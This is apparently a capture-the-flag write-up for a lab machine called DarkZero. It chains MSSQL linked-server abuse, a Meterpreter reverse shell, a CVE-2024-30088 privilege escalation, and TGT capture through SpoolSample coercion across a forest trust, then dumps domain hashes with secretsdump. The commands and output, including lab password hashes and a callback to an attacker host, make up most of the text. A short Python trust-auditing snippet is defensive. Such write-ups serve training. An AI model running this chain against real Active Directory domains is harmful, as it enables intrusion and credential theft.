
# DarkZero

### User

Abusing an MSSQL linked server on `DC01.darkzero.htb` gives user-level access to `DC02.darkzero.ext`: the link to `DC02.darkzero.ext` maps the local login `darkzero\john.w` to the remote login `dc01_sql_svc`.

```bash
impacket-mssqlclient john.w@DC01.darkzero.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (darkzero\john.w  guest@master)> enum_links
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------   
DC01                SQLNCLI            SQL Server    DC01                NULL                 NULL           NULL      

DC02.darkzero.ext   SQLNCLI            SQL Server    DC02.darkzero.ext   NULL                 NULL           NULL      

useLinked Server       Local Login       Is Self Mapping   Remote Login   
-----------------   ---------------   ---------------   ------------   
DC02.darkzero.ext   darkzero\john.w                 0   dc01_sql_svc   

```

Using a Meterpreter payload from revshells.com, we get a Metasploit session on `DC02`.

We then run the local exploit suggester to enumerate applicable Windows privilege-escalation modules; `cve_2024_30088_authz_basep` succeeds and gives a SYSTEM shell on `DC02`.

```bash
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.16.20:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 6176...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 608
[+] Successfully retrieved winlogon pid: 612
[*] Sending stage (203846 bytes) to 10.10.11.89
[*] Meterpreter session 3 opened (10.10.16.20:4444 -> 10.10.11.89:60473) at 2025-10-06 05:53:58 +0800

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::
meterpreter > help

```

### Root

Enumerating trust relationships with `powerview.py`, we see the following trust attributes:

```bash
╭─LDAPS─[DC01.darkzero.htb]─[darkzero-ext\Administrator]-[NS:<auto>] [CACHED]
╰─PV ❯ Get-NetTrust
objectClass                   : top
                                leaf
                                trustedDomain
whenCreated                   : 29/07/2025 15:30:19 (2 months, 6 days ago)
whenChanged                   : 29/09/2025 18:25:18 (6 days ago)
name                          : darkzero.ext
objectGUID                    : {dc96b90d-8181-4c7f-90df-54b9814a8c06}
securityIdentifier            : S-1-5-21-1969715525-31638512-2552845157
trustDirection                : INBOUND
                                OUTBOUND
                                BIDIRECTIONAL
trustPartner                  : darkzero.ext
trustType                     : WINDOWS_ACTIVE_DIRECTORY
                                MIT
trustAttributes               : FOREST_TRANSITIVE
                                CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION
flatName                      : darkzero-ext
msDS-TrustForestTrustInfo     : S-1-5-21-1969715525-31638512-2552845157

```

The trust carries the `CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION` attribute, so TGTs can be delegated across the forest trust. Running Rubeus in monitor mode on `DC02` to watch for incoming TGTs, we coerce authentication from `DC01` with SpoolSample.

```bash
PS C:\Users\Public> ./r.exe monitor /interval:5 /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
<snip>
[*] 10/5/2025 11:25:25 PM UTC - Found new TGT:

  User                  :  DC01$@DARKZERO.HTB
  StartTime             :  10/5/2025 2:06:22 PM
  EndTime               :  10/6/2025 12:06:20 AM
  RenewTill             :  10/12/2025 2:06:20 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    <snip>

[*] Ticket cache size: 9

## On another terminal
./SpoolSample.exe DC01.darkzero.htb DC02.darkzero.ext
```
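As an added defender-side example (not part of the original writeup), the following Python parses a `Get-NetTrust` record like the one above, decodes raw `trustAttributes` bits from LDAP, and flags the trust setting this coercion path relies on; the sample record is constructed to mirror the output above, and the `netdom` switch in the comment is the documented way to clear the flag.

```python
import re
from typing import Dict, List
# Bit values from MS-ADTS trustAttributes; names as PowerView prints them.
TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE", 0x0002: "UPLEVEL_ONLY", 0x0004: "QUARANTINED_DOMAIN",
    0x0008: "FOREST_TRANSITIVE", 0x0010: "CROSS_ORGANIZATION", 0x0020: "WITHIN_FOREST",
    0x0040: "TREAT_AS_EXTERNAL", 0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION", 0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

def decode_attributes(value: int) -> List[str]:
    """Decode a raw LDAP trustAttributes integer into PowerView-style names."""
    return [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]

def parse_nettrust(text: str) -> Dict[str, List[str]]:
    """Parse 'key : value' records; indented lines continue the previous key."""
    record: Dict[str, List[str]] = {}
    key = None
    for line in text.splitlines():
        m = re.match(r"^(\S[^:]*?)\s*:\s*(.*)$", line)
        if m:
            key = m.group(1)
            record[key] = [m.group(2).strip()]
        elif key and line.strip():
            record[key].append(line.strip())
    return record

def audit_trust(record: Dict[str, List[str]]) -> List[str]:
    partner = record.get("trustPartner", ["?"])[0]
    attrs = set(record.get("trustAttributes", []))
    findings: List[str] = []
    if "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION" in attrs:
        # A forwardable DC TGT can be delegated into the other forest. Fix:
        # netdom trust <trusting> /domain:<trusted> /EnableTgtDelegation:No
        findings.append(f"{partner}: TGT delegation enabled across the trust")
    if "FOREST_TRANSITIVE" in attrs and "BIDIRECTIONAL" in record.get("trustDirection", []):
        findings.append(f"{partner}: bidirectional forest trust; review unconstrained delegation on both sides")
    return findings

# Constructed sample mirroring the Get-NetTrust output in this writeup.
SAMPLE = """\
trustDirection                : BIDIRECTIONAL
trustPartner                  : darkzero.ext
trustAttributes               : FOREST_TRANSITIVE
                                CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION
"""

def run_example() -> List[str]:
    return audit_trust(parse_nettrust(SAMPLE))
```

Feed it the raw `trustAttributes` integer from an LDAP query via `decode_attributes` when PowerView output is not at hand.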

We can then use `impacket-ticketConverter` to convert the captured `.kirbi` ticket to `.ccache`, and use it with `secretsdump` against `DC01`.

{% code overflow="wrap" %}

```bash
echo "<snip>" | base64 -d > dc01.kirbi

impacket-ticketConverter dc01.kirbi dc01.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done


impacket-secretsdump 'DC01$'@DC01.darkzero.htb -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::
john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:95e4ba6219aced32642afa4661781d4b:::
[*] Kerberos keys grabbed
Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
Administrator:0x13:a23315d970fe9d556be03ab611730673
Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41
krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3
krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7
john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea
john.w:0x13:7b145a89aed458eaea530a2bd1eb93bd
john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e
john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db
john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b
DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941
DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db
DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a
darkzero-ext$:aes256-cts-hmac-sha1-96:eec6ace095e0f3b33a9714c2a23b19924542ba13a3268ea6831410020e1c11f3
darkzero-ext$:aes128-cts-hmac-sha1-96:3efb8a66f0a09fbc6602e46f22e8fc1c
darkzero-ext$:0x17:95e4ba6219aced32642afa4661781d4b
[*] Cleaning up... 

```

{% endcode %}

Finally, authenticating as Administrator with `evil-winrm`, we can read both flags.

```bash
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         10/5/2025   2:06 PM             34 root.txt
-ar---         10/5/2025   2:06 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type *
ca2f5f1a32<snip>
82db32d8<snip>

```

